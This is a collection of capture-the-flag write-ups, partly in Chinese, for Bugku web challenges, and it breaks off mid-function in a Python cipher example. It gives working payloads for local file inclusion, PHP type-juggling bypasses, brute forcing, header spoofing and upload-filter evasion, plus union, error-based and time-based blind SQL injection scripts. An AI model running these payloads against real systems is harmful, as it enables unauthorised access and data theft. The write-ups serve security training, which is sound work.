var p2 = '%61%61%36%34%38%63%66%36%65%38%37%61%37%31%31%34%66%31%22%3d%3d%61%2e%76%61%6c%75%65%29%72%65%74%75%72%6e%21%30%3b%61%6c%65%72%74%28%22%45%72%72%6f%72%22%29%3b%61%2e%66%6f%63%75%73%28%29%3b%72%65%74%75%72%6e%21%31%7d%7d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%6c%65%76%65%6c%51%75%65%73%74%22%29%2e%6f%6e%73%75%62%6d%69%74%3d%63%68%65%63%6b%53%75%62%6d%69%74%3b';
eval(unescape(p1) + unescape('%35%34%61%61%32' + p2));
</script>

Run unescape(p1) + unescape('%35%34%61%61%32' + p2) in the console (without the eval) to see the code that is being executed:

function checkSubmit(){var a=document.getElementById("password");if("undefined"!=typeof a){if("67d709b2b54aa2aa648cf6e87a7114f1"==a.value)return!0;alert("Error");a.focus();return!1}}document.getElementById("levelQuest").onsubmit=checkSubmit;

The password check is client-side and compares against a literal. Enter 67d709b2b54aa2aa648cf6e87a7114f1 in the input and submit to get the flag.

The flag is in index (flag在index里)

The title alone suggests a local file inclusion.

The link on the page leads to

http://123.206.87.240:8005/post/index.php?file=show.php

Trying

http://123.206.87.240:8005/post/index.php?file=index.php

does not help: including index.php executes it, and the flag is in its source, which is never rendered. The source has to be read rather than run.

Build the payload with the php://filter stream wrapper:

http://123.206.87.240:8005/post/index.php?file=php://filter/read=convert.base64-encode/resource=index.php

php://filter opens a local file through a filter chain; read=convert.base64-encode base64-encodes the content (an encoding, not encryption), so the include returns harmless text instead of executing PHP; resource=index.php names the file to read.

Base64-decode what comes back and the flag is in the source.

Enter the password to view the flag (输入密码查看flag)

The link says outright that this is brute force, and the challenge says the password is five digits.

Straight to Burp Intruder.

Set a numeric payload from 10000 to 99999 with step 1;

a generated wordlist works just as well.

The brute force finds the password 13579.

Enter it and the flag appears.

Click one million times (点击一百万次)

The site is dead now.

When I did it, sending a single POST via HackBar with the click count set to at least one million was enough; the counter is only checked on the submitted value.

Backups are a good habit (备份是个好习惯)

Request http://123.206.87.240:8002/web16/index.php.bak directly.

The browser downloads index.php.bak; open it in an editor and it is the source of index.php:

<?php
include_once "flag.php";
ini_set("display_errors", 0);
$str = strstr($_SERVER['REQUEST_URI'], '?');
$str = substr($str, 1);
$str = str_replace('key', '', $str);
parse_str($str);
echo md5($key1);
echo md5($key2);
if (md5($key1) == md5($key2) && $key1 !== $key2) {
    echo $flag . "取得flag";
}
?>

The query string is cut out of REQUEST_URI, the word key is removed, and parse_str() turns whatever is left into variables. str_replace() makes a single pass, so writing kekeyy leaves key behind once the inner key is removed.

The MD5 values of key1 and key2 must be == while the raw values must be !==, which is exactly what two arrays give you: md5() of an array fails with a warning (suppressed by display_errors=0) and returns NULL, NULL == NULL, and the two arrays are not identical. (On PHP 8 md5() on an array throws a TypeError instead.)

payload: http://123.206.87.240:8002/web16/index.php?kekeyy1[]=1&kekeyy2[]=2

and the flag is printed.

Report card (成绩单)

A textbook SQL injection.

id values 1, 2 and 3 return normally.

1' order by 4# returns normally and 1' order by 5# errors, so the query has four columns.

Check which columns are displayed first: -1' union select 1,2,3,4# renders normally, so go straight for the database name.

-1' union select 1,2,3,database()# gives the database skctf_flag.

Now the tables:

-1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()#

which gives the table names fl4g,sc.

The columns (the table name written as hex 0x666c3467, i.e. 'fl4g', so no quotes are needed):

-1' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=0x666c3467#

which gives the column skctf_flag.

Now the data can be read directly:

id=-1' union select 1,2,3,skctf_flag from fl4g#

which returns the flag.

Qiuming Mountain driver (秋名山老司机)

The answer has to be submitted within 2 seconds, which no human manages, so fetch the page with Python and POST the result from the same session:

import requests
import re
from bs4 import BeautifulSoup

url = "http://123.206.87.240:8002/qiumingshan/"
session = requests.session()          # the expression is tied to the session cookie
r = session.get(url)
r.encoding = "utf8"
print(r.text)
div = re.findall(r"<div>(.*?)</div>", r.text)
print(div)
soup = BeautifulSoup(r.text, "html5lib")
for div in soup.select('div'):
    calc = div.text
    calc = calc[:-3]                  # strip the trailing "=?;"
    result = eval(calc)               # evaluates text supplied by the server; see the note below
    r = session.post(url, data={"value": result})
    print(r.text)

Network jitter sometimes makes it miss the 2-second window; run it a few more times and it comes through.

Be quick (速度要快)

The source contains

<!-- OK ,now you have to post the margin what you find -->

Nothing else to go on, so capture a request.

In Repeater the response carries a flag header, and its value changes on every request:

flag: 6LeR55qE6L+Y5LiN6ZSZ77yM57uZ5L2gZmxhZ+WQpzogT0RrMU9UYzA=

Base64-decoding it:

跑的还不错,给你flag吧: ODk1OTc0 (not bad, here is your flag: ODk1OTc0)

Now it makes sense:

margin is a CSS property, which is what the comment alludes to, and the value after the colon decoded once more is the number 895974.

So POST margin=895974 and that should be it,

except the value changes on every refresh, so do it from one session in Python:

import requests
import base64

url = 'http://123.206.87.240:8002/web6/'
r = requests.session()                       # one session for the GET and the POST
s = r.get(url)
flag = s.headers['flag']                      # per-request base64 value in the response header
mid = base64.b64decode(flag)
mid = mid.decode()
flag = base64.b64decode(mid.split(':')[1])    # the text after the colon is base64 again
data = {'margin': flag}
print(r.post(url, data=data).text)

Running it gives KEY{111dd62fcd377076be18a}

Cookie spoofing (cookies欺骗)

The page shows a repeated string that means nothing on its own,

but the URL carries an obvious base64 value:

a2V5cy50eHQ=

which decodes to keys.txt.

Replace it with the base64 of index.php and there is output:

http://123.206.87.240:8002/web11/index.php?line=1&filename=aW5kZXgucGhw returns a different line of the PHP file for each value of line, so pull the lines with Python:

import requests

for i in range(30):
    url = 'http://123.206.87.240:8002/web11/index.php?line=' + str(i) + '&filename=aW5kZXgucGhw'
    r = requests.get(url)
    print(r.text)

Assembled, the source is:

<?php
error_reporting(0);
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");
$file_list = array(
'0' =>'keys.txt',
'1' =>'index.php',
);
if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){
    $file_list[2]='keys.php';
}
if(in_array($file, $file_list)){
    $fa = file($file);
    echo $fa[$line];
}
?>

The direct route is the cookie check: $_COOKIE['margin']=='margin' adds keys.php to the allowed list. Send the cookie margin=margin with HackBar, request filename set to the base64 of keys.php (a2V5cy5waHA=), step through line as before, and view the page source for the flag.

never give up

The URL has id=1; changing it does nothing.

F12 shows

<!--1p.html-->

so go to 1p.html.

Opening it directly does not work (the page redirects away),

so read it as view-source:123.206.87.240:8006/test/1p.html

The source contains an encoded blob. URL-decoding it once gives

"<script>window.location.href='http://www.bugku.com';</script>
<!--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-->"

Base64-decode the middle part:

%22%3Bif%28%21%24_GET%5B%27id%27%5D%29%0A%7B%0A%09header%28%27Location%3A%20hello.php%3Fid%3D1%27%29%3B%0A%09exit%28%29%3B%0A%7D%0A%24id%3D%24_GET%5B%27id%27%5D%3B%0A%24a%3D%24_GET%5B%27a%27%5D%3B%0A%24b%3D%24_GET%5B%27b%27%5D%3B%0Aif%28stripos%28%24a%2C%27.%27%29%29%0A%7B%0A%09echo%20%27no%20no%20no%20no%20no%20no%20no%27%3B%0A%09return%20%3B%0A%7D%0A%24data%20%3D%20@file_get_contents%28%24a%2C%27r%27%29%3B%0Aif%28%24data%3D%3D%22bugku%20is%20a%20nice%20plateform%21%22%20and%20%24id%3D%3D0%20and%20strlen%28%24b%29%3E5%20and%20eregi%28%22111%22.substr%28%24b%2C0%2C1%29%2C%221114%22%29%20and%20substr%28%24b%2C0%2C1%29%21%3D4%29%0A%7B%0A%09require%28%22f4l2a3g.txt%22%29%3B%0A%7D%0Aelse%0A%7B%0A%09print%20%22never%20never%20never%20give%20up%20%21%21%21%22%3B%0A%7D%0A%0A%0A%3F%3E

and URL-decode once more:

";if(!$_GET['id'])
{
    header('Location: hello.php?id=1');
    exit();
}
$id=$_GET['id'];
$a=$_GET['a'];
$b=$_GET['b'];
if(stripos($a,'.'))
{
    echo 'no no no no no no no';
    return ;
}
$data = @file_get_contents($a,'r');
if($data=="bugku is a nice plateform!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)
{
    require("f4l2a3g.txt");
}
else
{
    print "never never never give up !!!";
}
?>

The code names the file f4l2a3g.txt, and it is reachable directly: view-source:http://123.206.87.240:8006/test/f4l2a3g.txt

which gives the flag.

welcome to bugkuctf

The target is down.

One-liner past the dog (过狗一句话)

The target is down.

Characters? Regex? (字符?正则?)

<?php
highlight_file('2.php');
$key='KEY{********************************}';
$IM= preg_match("/key.*key.{4,7}key:\/.\/(.*key)[a-z][[:punct:]]/i", trim($_GET["id"]), $match);
if( $IM ){ die('key is: '.$key);
}
?>

Just a regex.

id is passed via GET

and has to match /key.*key.{4,7}key:\/.\/(.*key)[a-z][[:punct:]]/i

. matches any single character except "\n"

* matches the preceding expression 0 or more times, equivalent to {0,}

{4,7} matches the preceding expression at least 4 and at most 7 times; combined with the . before it, 4 to 7 arbitrary characters

\/ matches a literal /, the backslash escapes it

[a-z] matches one lowercase letter

[[:punct:]] matches one punctuation character

/i makes the whole match case-insensitive

Build the string piece by piece: key, nothing for .*, key, aaaa for .{4,7}, key:/a/, key for (.*key), a for [a-z] and : for the punctuation. payload: http://120.24.86.145:8002/web10/?id=keykeyaaaakey:/a/keya: and the key is returned.

Ex-girlfriend (前女友, SKCTF)

Nothing obvious on the first page; in the source the word 链接 is a link, and it leads to a page showing:

<?php
if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){
    $v1 = $_GET['v1'];
    $v2 = $_GET['v2'];
    $v3 = $_GET['v3'];
    if($v1 != $v2 && md5($v1) == md5($v2)){
        if(!strcmp($v3, $flag)){
            echo $flag;
        }
    }
}
?>

Required: v1 != v2 with md5(v1) == md5(v2), and v3 equal to $flag according to strcmp().

For v1 and v2, pick two strings whose MD5 begins with 0e followed by digits; the loose == then treats both hashes as 0. But what about v3?

Looking up strcmp() I found the relevant weakness:

from PHP 5.3 on, passing a non-string such as an array makes strcmp() emit a warning and return NULL instead of an integer, and !NULL is true, so the check passes as though the strings were equal. (PHP 8 throws a TypeError instead.) So pass v3 as an array and the flag comes out.

payload: http://123.206.31.85:49162/?v1=s878926199a&v2=s155964671a&v3[]=12

login1 (SKCTF)

The challenge hints at a SQL constraint attack.

It is an ordinary login form. Registering an account and logging in says you are not the administrator,

and the password policy (mixed case plus digits) makes brute force impractical.

Looking up the constraint attack: when MySQL compares strings it ignores trailing spaces, so admin and admin followed by spaces compare as equal, and a value longer than the column is silently truncated to the column width on insert.

So register a user named admin followed by spaces (padded past the column length so the stored value is cut down to admin plus padding). The login query's username='admin' then matches the new row with the password you chose, the "is this the administrator" check returns true, and the flag is shown after logging in.

Where are you from (你从哪里来)

The page asks whether I come from Google. Capture the request in Burp and add the header Referer: https://www.google.com, and it agrees that I do.

md5 collision (NUPT_CTF)

The challenge is called MD5 collision and asks for a. Passing a=1 on the URL returns false, so the comparison behind it is a loose == between MD5 hashes; pass a string whose MD5 starts with 0e followed by digits and the flag comes out.

payload: http://123.206.87.240:9009/md5.php?a=s878926199a

Strings whose MD5 begins with 0e (md5之后0e开头的)

Having done several md5 collision challenges, here is the list I keep (each string followed by its MD5; every hash is 0e plus digits only, so PHP's == treats them all as 0):

s878926199a
0e545993274517709034328855841020
s155964671a
0e342768416822451524974117254469
s214587387a
0e848240448830537924465865611904
s1091221200a
0e940624217856561557816327384675
s1885207154a
0e509367213418206700842008763514
s1502113478a
0e861580163291561247404381396064
s1836677006a
0e481036490867661113260034900752
s1184209335a
0e072485820392773389523109082030
s1665632922a
0e731198061491163073197128363787
s532378020a
0e220463095855511507588041205815

Programmer's local site (程序员本地网站)

Same idea as the admin system above: add X-FORWARDED-FOR:127.0.0.1 to the request headers and it is solved.

All kinds of bypasses (各种绕过)

<?php
highlight_file('flag.php');
$_GET['id'] = urldecode($_GET['id']);
$flag = 'flag{xxxxxxxxxxxxxxxxxx}';
if (isset($_GET['uname']) and isset($_POST['passwd'])) {
    if ($_GET['uname'] == $_POST['passwd'])
        print 'passwd can not be uname.';
    else if (sha1($_GET['uname']) === sha1($_POST['passwd'])&($_GET['id']=='margin'))
        die('Flag: '.$flag);
    else
        print 'sorry!';
}
?>

id must be margin, uname and passwd must differ, and their sha1 values must be identical (this time with ===, so the 0e trick does not apply).

While looking for sha1 values that compare equal I found the array trick:

sha1() of an array returns NULL with a warning (before PHP 8), so uname[]=1&passwd[]=23 gives NULL === NULL while the two arrays are not == equal (the numbers inside can be anything).

payload: GET http://123.206.87.240:8002/web7/?id=margin&uname[]=1 with POST body passwd[]=23

and the flag is printed.

web8

The hint is txt???. The page shows:

<?php
extract($_GET);
if (!empty($ac))
{
    $f = trim(file_get_contents($fn));
    if ($ac === $f)
    {
        echo "<p>This is flag:" ." $flag</p>";
    }
    else
    {
        echo "<p>sorry!</p>";
    }
}
?>

extract($_GET) turns every query parameter into a PHP variable, so both $ac and $fn are under our control.

Following the hint, flag.txt exists

and contains flags.

So ac must be the trimmed content of flag.txt, i.e. flags, and fn the file name flag.txt:

payload: http://123.206.87.240:8002/web8/?ac=flags&fn=flag.txt

and the flag is printed.

Careful (细心)

The target is down.

Get a shell (求getshell)

It wants an image file, not a PHP file: an upload challenge.

Uploading a one-line webshell returns a file-type error. In Burp there are two obvious things to change: the filename and the Content-Type of the uploaded part. I tried filename extensions one by one with an image Content-Type on the part and nothing worked. What I found later is that there is a second Content-Type, the request-level multipart/form-data header: changing the case of that value gets the upload past the check.

INSERT INTO injection (INSERT INTO注入)

error_reporting(0);
function getIp(){                                      // get the client IP
    $ip = '';
    if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){       // read X-Forwarded-For from the request headers
        $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
    }else{
        $ip = $_SERVER['REMOTE_ADDR'];
    }
    $ip_arr = explode(',', $ip);
    return $ip_arr[0];
}
$host="localhost";
$user="";
$pass="";
$db="";
$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");
mysql_select_db($db) or die("Unable to select database");
$ip = getIp();
echo 'your ip is :'.$ip;
$sql="insert into client_ip (ip) values ('$ip')";     // the statement we inject into
mysql_query($sql);

Read the source first. The "IP" is taken from the client-controlled X-Forwarded-For header and concatenated into an INSERT without escaping. The hint says to write a Python script: nothing from the query is echoed and there is no error output, so the only channel left is time-based blind injection with sleep(). Two details shape the payloads: explode(',') keeps only the text before the first comma, so the payload must not contain a comma (hence substr(x from n for 1) rather than substr(x, n, 1)), and string comparison under MySQL's default collation is case-insensitive, so the lowercase candidate always matches first.

import requests

dic = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_'
# payload for the database name
payload_db = "1'+(select case when (substr(database() from {0} for 1)='{1}') then sleep(6) else 1 end)+'1"
# payload for the number of tables
payload_tb_num = "1'+(select case when (select count(*) from information_schema.TABLES where TABLE_SCHEMA='{0}')='{1}' then sleep(6) else 1 end)+'1"
# payload for the length of a table name (not strictly needed: guessing characters until no
# further ReadTimeout occurs also tells you the name is complete)
payload_tb_name_len = "1'+(select case when (select length(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA='{0}' limit 1 offset {1}) = '{2}' then sleep(6) else 1 end)+'1"
# payload for the table name itself
payload_tb_name = "1'+(select case when (substr((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA='{0}' limit 1 offset {1}) from {2} for 1)) = '{3}' then sleep(6) else 1 end)+'1"
url = 'http://123.206.87.240:8002/web15/'

# database name
db_name = ''
for i in range(1, 6):
    for j in dic:
        try:
            headers = {'x-forwarded-for': payload_db.format(i, j)}
            res = requests.get(url, headers=headers, timeout=5)
        except requests.exceptions.ReadTimeout:     # timeout means sleep() fired: the guess is right
            print(payload_db.format(i, j))
            db_name += j
            break
print('db_name: ' + db_name)   # the database turns out to be web15

# number of tables
tb_num = 0
for i in range(1, 50):
    try:
        headers = {'x-forwarded-for': payload_tb_num.format(db_name, str(i))}
        res = requests.get(url, headers=headers, timeout=5)
    except requests.exceptions.ReadTimeout:
        tb_num = i
        print('tb_num: ' + str(i))
        break
# two tables

# table names
length = 0
for i in range(tb_num):
    # length first
    for j in range(50):
        try:
            headers = {'x-forwarded-for': payload_tb_name_len.format(db_name, i, j)}
            res = requests.get(url, headers=headers, timeout=5)
        except requests.exceptions.ReadTimeout:
            length = j
            break
    print('No.' + str(i + 1) + ' table has length: ' + str(length))
    # then the name, one character at a time
    tb_name = ''
    for k in range(1, length + 1):
        for j in dic:
            try:
                headers = {'x-forwarded-for': payload_tb_name.format(db_name, i, k, j)}
                res = requests.get(url, headers=headers, timeout=5)
            except requests.exceptions.ReadTimeout:
                print(payload_tb_name.format(db_name, i, k, j))
                tb_name += j
                break
    print(tb_name)
# the two tables are flag and client_ip

My Python is not good enough to write this; it is from the internet, but after running it once it is readable enough to adapt. With the table name known, the same approach reads the flag column:

import requests

url = "http://123.206.87.240:8002/web15/"
flag = ""
for i in range(1, 33):
    for str1 in "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_,!@#$%^&*``.":
        data = "1' and (case when (substr((select group_concat(flag) from flag) from " + str(i) + " for 1 )='" + str1 + "') then sleep(4) else 1 end )) #"
        headers = {'X-ForWarded-For': data}
        try:
            result = requests.get(url, headers=headers, timeout=3)
        except requests.exceptions.ReadTimeout:     # sleep(4) fired, so this character is correct
            flag += str1
            print(flag)
            break
print(flag)

When it finishes, the flag is there.
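Both scripts above walk a 60-odd-character alphabet for every position, one request per candidate. Here is an added Python example of the same blind extraction done with a binary search on the character's code point, about seven oracle calls per character instead of up to sixty. It is my illustration, not the challenge's code: the oracle is simulated with an in-memory SQLite table named flag holding a constructed value, so it runs offline; against the real target the oracle answer would be "did the request time out", i.e. whether sleep() fired. Two things to adapt for MySQL: ascii() instead of SQLite's unicode(), and substr(x from n for 1) rather than the comma form, because getIp() keeps only the text before the first comma.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the web15 database: a flag table and a client_ip table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE flag(flag TEXT);"
        "INSERT INTO flag VALUES ('flag{blind_demo}');"
        "CREATE TABLE client_ip(ip TEXT);"
    )
    return conn


def make_oracle(conn):
    """Simulates the one bit a time-based channel leaks: was the condition true?
    On the real target this is 'the request hit the timeout because sleep() ran'."""
    def oracle(condition: str) -> bool:
        row = conn.execute("SELECT CASE WHEN (%s) THEN 1 ELSE 0 END" % condition).fetchone()
        return row[0] == 1
    return oracle


def extract(oracle, expr: str, max_len: int = 64) -> str:
    """Recover the string value of the SQL expression `expr` one character at a time.

    For each position, first ask whether the string is that long; then binary
    search the code point of that character within printable ASCII (32..126),
    which takes about seven questions.  SQLite's unicode() is ascii() on MySQL.
    """
    out = []
    for pos in range(1, max_len + 1):
        if not oracle("length(%s) >= %d" % (expr, pos)):
            break
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle("unicode(substr(%s, %d, 1)) > %d" % (expr, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        out.append(chr(lo))
    return "".join(out)


class CountingOracle:
    """Wraps an oracle and counts calls, to compare against the linear alphabet scan."""

    def __init__(self, oracle):
        self.oracle = oracle
        self.calls = 0

    def __call__(self, condition: str) -> bool:
        self.calls += 1
        return self.oracle(condition)


if __name__ == "__main__":
    o = CountingOracle(make_oracle(make_db()))
    print(extract(o, "(select group_concat(flag) from flag)"), o.calls, "queries")
```

Against the real target each oracle call is one HTTP request with the condition wrapped in the sleep() case expression from the scripts above, and the sleep duration has to comfortably exceed normal response time or a slow response will be read as a true answer.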

A magic login box (这是一个神奇的登陆框)

Just a login form, but the URL mentions sql, so it is probably another injection challenge; start by looking for the injection point.

Entering 1" produces an error:

Try Again!
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1"' at line 1

Entering 1" # is normal again, so the value is enclosed in double quotes.

1" order by 2 # is normal; 1" order by 3 # returns

Unknown column '3' in 'order clause'

so the query has two columns.

Find which column is displayed: -1" union select 1, 2 #

returns

Good Job!
Login_Name:1
You must login with correct ACCOUNT and PASSWORD!

Database:

-1" union select database(),2#

gives the database name bugkusql1

Tables:

-1" union select group_concat(table_name),2 from information_schema.tables where table_schema=database()#

gives the tables flag1,whoami

Columns:

-1" union select group_concat(column_name),2 from information_schema.columns where table_name='flag1'#

gives the column flag1

Data:

-1" union select group_concat(flag1),2 from flag1 #

and the flag appears.

-1" union select *,2 from flag1 #

works as well, since flag1 has a single column, so the column enumeration can be skipped.

Many times (多次)

The URL has id=1; changing it shows different text up to 5, after which the page says

Error,Error,Error!

Clearly an injection challenge;

at id=5 it even invites you to try SQL injection, so start.

id=1' errors

id=1" does not

so the value is enclosed in single quotes

and there is an injection point.

A few attempts show that there is filtering.

Probe it with an XOR expression:

payload: http://123.206.87.240:9004/1ndex.php?id=1'^(length('and')!=0)--+

If the word survives the filter, length('and')!=0 is true, 1^1 is 0 and the page changes; if it is stripped, the expression becomes length('')!=0, i.e. 0, and the page looks normal.

This shows that and, or, union and select are filtered.

The filter removes each keyword once, so doubling the keyword (ununionion, seselectlect, oorr) leaves the keyword intact after the removal.

Column count with order by: http://123.206.87.240:9004/1ndex.php?id=1' oorrder by 2 --+

2 is fine and 3 errors.

Find the displayed column:

http://123.206.87.240:9004/1ndex.php?id=-1' ununionion seselectlect 1,2 --+

displays 2.

Database:

http://123.206.87.240:9004/1ndex.php?id=-1' ununionion seselectlect 1,database() --+

web1002-1

Tables (information_schema contains or, so it is doubled too):

http://123.206.87.240:9004/1ndex.php?id=-1' ununionion seselectlect 1,group_concat(table_name) from infoorrmation_schema.tables where table_schema="web1002-1"--+

flag1,hint

Columns:

http://123.206.87.240:9004/1ndex.php?id=-1' ununionion seselectlect 1,group_concat(column_name) from infoorrmation_schema.columns where table_name="flag1"--+

flag1,address

Data:

http://123.206.87.240:9004/1ndex.php?id=-1' ununionion seselectlect 1,group_concat(flag1) from flag1--+

usOwycTju+FTUUzXosjr

That turns out not to be the flag, so read the address column instead:

http://123.206.87.240:9004/1ndex.php?id=-1' ununionion seselectlect 1,group_concat(address) from flag1--+

which gives the address of the next level.
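The keyword filter in this level, and the union-based enumeration used here and in the 成绩单 and login-box levels, can be reproduced offline. The following Python example is added by me, not the challenge's code: an in-memory SQLite database with constructed news and flag1 tables stands in for web1002-1, naive_filter() is a single-pass keyword removal like the one the level appears to use, and double_write() produces a token for any blacklisted word that survives one pass. The same payload sent through a parameterised query returns nothing. SQLite has no information_schema, so the example stops at pulling the flag column rather than enumerating tables.

```python
import re
import sqlite3

# Blacklist the level appears to enforce. Removal is a single pass, like PHP's str_replace().
BLACKLIST = ("union", "select", "and", "or")


def naive_filter(query_param: str) -> str:
    """Single-pass, case-insensitive keyword removal. Not a real defence: in
    'ununionion' the inner 'union' is removed and the outer halves fuse back into 'union'."""
    for kw in BLACKLIST:
        query_param = re.sub(kw, "", query_param, flags=re.IGNORECASE)
    return query_param


def double_write(keyword: str) -> str:
    """Split the keyword and nest a full copy inside it: union -> un + union + ion.
    One pass of naive_filter() removes the inner copy and leaves the keyword."""
    half = len(keyword) // 2
    return keyword[:half] + keyword + keyword[half:]


def make_db() -> sqlite3.Connection:
    """Constructed data standing in for the level's database (web1002-1)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE news(id INTEGER, title TEXT);
        INSERT INTO news VALUES (1, 'first post'), (2, 'second post');
        CREATE TABLE flag1(flag1 TEXT, address TEXT);
        INSERT INTO flag1 VALUES ('flag{demo_double_write}', './Once_More.php');
        """
    )
    return conn


def vulnerable_lookup(conn, user_id: str):
    """String-concatenated query as in the challenge; the filter is the only protection."""
    sql = "SELECT id, title FROM news WHERE id = '%s'" % naive_filter(user_id)
    return conn.execute(sql).fetchall()


def safe_lookup(conn, user_id: str):
    """Parameterised query: the same payload is just a value that matches nothing."""
    return conn.execute("SELECT id, title FROM news WHERE id = ?", (user_id,)).fetchall()


def build_payload(column: str, table: str) -> str:
    """-1' union select 1,group_concat(col) from table -- with blacklisted words doubled.
    The two-column shape matches the order by result (2 works, 3 errors)."""
    return "-1' %s %s 1,group_concat(%s) from %s -- " % (
        double_write("union"), double_write("select"), column, table)


def injection_succeeds(conn, payload: str) -> bool:
    """True if the injected query runs and leaks a flag{...} value through the title column."""
    try:
        rows = vulnerable_lookup(conn, payload)
    except sqlite3.OperationalError:       # mangled by the filter: syntax error, nothing leaks
        return False
    return any("flag{" in str(row[1]) for row in rows)


if __name__ == "__main__":
    db = make_db()
    payload = build_payload("flag1", "flag1")
    print(naive_filter(payload))
    print(vulnerable_lookup(db, payload))
```

The un-doubled payload is what the filter is designed for: it comes out as -1' 1,group_concat(flag1) from flag1 -- and fails with a syntax error, while the doubled one passes through as a complete union select. The parameterised version never sees SQL in the value at all, which is the actual fix.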

也是地址栏来传id

'闭合注入点有了

这关双写绕过和大小写绕过都过滤了,那就用报错注入

http://123.206.87.240:9004/Once_More.php?id=1' order by 2--+返回正常

3报错 Unknown column '3' in 'order clause'

那就是两个字段

爆表

http://123.206.87.240:9004/Once_More.php?id=1' and (extractvalue(1,concat(0x7e,database(),0x7e)))--+

得到XPATH syntax error: '~web1002-2~'

爆表

http://123.206.87.240:9004/Once_More.php?id=1' and (extractvalue(1,concat(0x7e, (select group_concat(table_name) from information_schema.tables where table_schema="web1002-2"),0x7e)))--+

得到XPATH syntax error: '~class,flag2~'

爆字段

http://123.206.87.240:9004/Once_More.php?id=1' and (extractvalue(1,concat(0x7e, (select group_concat(column_name) from information_schema.columns where table_name="flag2"),0x7e)))--+

得到XPATH syntax error: '~flag2,address~'

查数据

http://123.206.87.240:9004/Once_More.php?id=1' and (extractvalue(1,concat(0x7e, (select group_concat(flag2) from flag2),0x7e)))--+

得到XPATH syntax error: '~flag{Bugku-sql_6s-2i-4t-bug}~'

把B改小写就是了

去看一下第三关

XPATH syntax error: '~./Have_Fun.php~'

进去是空白页面,查看下源码

<!DOCTYPE html>
<html>
<head><title>Have_Fun</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<!-- <style>
html,body{padding: 0;margin: 0;background-color: #fff;
}
Only IP'1234' can access this site.
<style>  -->
</head>
<body>
</body>
</html>
<center><font  color= '#fff'>YOUR IP:39.172.208.228<br />Sorry,Only IP:192.168.0.100 Can Access This Site<br /><br></font></center>

Need to intercept and modify the request; will come back to this later.

PHP_encrypt_1(ISCCCTF)

A zip archive containing index.php; the challenge gives the string fR4aHWwuFCYYVydFRxMqHhhCKBseH1dbFygrRxIWJ1UYFhotFjA=

<?php
function encrypt($data, $key)
{
    $key = md5('ISCC');
    $x = 0;
    $len = strlen($data);
    $klen = strlen($key);
    for ($i = 0; $i < $len; $i++) {
        if ($x == $klen) {
            $x = 0;
        }
        $char .= $key[$x];
        $x += 1;
    }
    for ($i = 0; $i < $len; $i++) {
        $str .= chr((ord($data[$i]) + ord($char[$i])) % 128);
    }
    return base64_encode($str);
}
?>

Roughly: the key is fixed, and some string run through this function becomes the string the challenge gives, so we write a decryption routine that reverses it.

<?php
function decrypt()
{
    $miwen = "fR4aHWwuFCYYVydFRxMqHhhCKBseH1dbFygrRxIWJ1UYFhotFjA=";   // the given base64-encoded ciphertext
    $mi1 = base64_decode($miwen);                // base64-decode first
    $char = "";
    $str = "";
    $len = strlen($mi1);                         // ciphertext length
    $key = md5('ISCC');                          // same step as in encrypt, so we rebuild the same key
    $x = 0;
    $klen = strlen($key);                        // key length
    for ($s = 0; $s < $len; $s++) {
        if ($x == $klen) {
            $x = 0;
        }
        $char .= $key[$x];                       // take key[x] each round and append it to char (the real keystream); encryption and decryption use the same keystream
        $x += 1;
    }
    for ($i = 0; $i < $len; $i++) {              // the core of the decryption
        $xia = ord($mi1[$i]) - ord($char[$i]);   // encryption added the two bytes and took mod 128, so subtract here
        if ($xia < 0) {
            $str .= chr($xia + 128);             // undo the wrap-around of the mod 128
        } else {
            $str .= chr($xia % 128);             // no wrap-around happened, the difference is the plaintext byte
        }
    }
    echo $str . "\n";
}
decrypt();
?>

Run it and the flag comes out.
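For reference, an added Python port of the challenge's encrypt() and its inverse (not part of the write-up; the names keystream, encrypt and decrypt are my own). It makes the weakness of the scheme plain: the fixed key md5('ISCC') is repeated across the message and added byte-wise mod 128, a repeating-key Vigenere-style cipher, so anyone who reads the source inverts it exactly as the PHP decrypt above does. The ciphertext constant is the one the challenge gives.

```python
import base64
import hashlib

# Same fixed key as the challenge: the hex digest of md5('ISCC'), 32 ASCII characters.
KEY = hashlib.md5(b"ISCC").hexdigest()

CHALLENGE_CIPHERTEXT = "fR4aHWwuFCYYVydFRxMqHhhCKBseH1dbFygrRxIWJ1UYFhotFjA="


def keystream(length: int) -> str:
    """Repeat the key until it covers the message (what the PHP loop builds into $char)."""
    return (KEY * (length // len(KEY) + 1))[:length]


def encrypt(data: str) -> str:
    """Port of the challenge's encrypt(): plaintext byte + key byte mod 128, then base64.
    Only 7-bit input is reversible, because the mod 128 discards the top bit."""
    if any(ord(ch) > 127 for ch in data):
        raise ValueError("encrypt() only round-trips 7-bit ASCII")
    ks = keystream(len(data))
    out = bytes((ord(d) + ord(k)) % 128 for d, k in zip(data, ks))
    return base64.b64encode(out).decode("ascii")


def decrypt(token: str) -> str:
    """Inverse: subtract the same key byte mod 128. Python's % already yields a value
    in 0..127 for negative differences, which is the +128 branch in the PHP."""
    raw = base64.b64decode(token)
    ks = keystream(len(raw))
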